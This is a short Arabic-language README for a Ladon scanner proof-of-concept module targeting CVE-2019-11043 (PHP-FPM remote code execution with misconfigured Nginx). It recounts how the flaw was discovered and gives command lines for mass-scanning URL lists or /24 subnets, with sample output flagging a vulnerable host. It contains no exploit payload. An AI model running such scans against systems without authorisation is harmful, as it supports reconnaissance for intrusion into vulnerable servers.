
Ladon POC Moudle CVE-2019-11043 (PHP-FPM + Ngnix)
ثغرة تنفيذ التعليمات البرمجية عن بُعد في PHP-FPM (CVE-2019-11043)
في مسابقة Real World CTF التي نظمتها شركة Changting Technology، اكتشف الباحث الأمني الدولي Andrew Danau أثناء حل أحد تحديات CTF أن إرسال رمز %0a إلى عنوان URL الخاص بالخادم المستهدف يؤدي إلى استجابة غير طبيعية من الخادم، مما يشير إلى احتمال وجود ثغرة.
في حالة استخدام بعض تكوينات Nginx الخاطئة، يمكن من خلال حزمة بيانات تم إنشاؤها بشكل ضار جعل PHP-FPM ينفذ أي كود.
ضع الملف في نفس الدليل مع Ladon.exe، وسيتم إجراء فحص جماعي لشبكة C أو url.txt
Ladon CVE-2019-11043_Poc.ini فحص جماعي لعناوين URL (ضع url.txt في الدليل الجذر)
Ladon 192.168.1.37/24 CVE-2019-11043_Poc.ini فحص جماعي لأجهزة قطاع C لمعرفة ما إذا كانت تحتوي على هذه الثغرة
Ladon http://192.168.1.37:8080/index.php CVE-2019-11043_Poc.ini تحديد عنوان URL
Ladon 5.5
By K8gege
Call AnyExe/Command
http://192.168.1.37:8080/index.php
load F:\Python279\python.exe
ISVUL: CVE-2019-11043 http://192.168.1.37:8080/index.php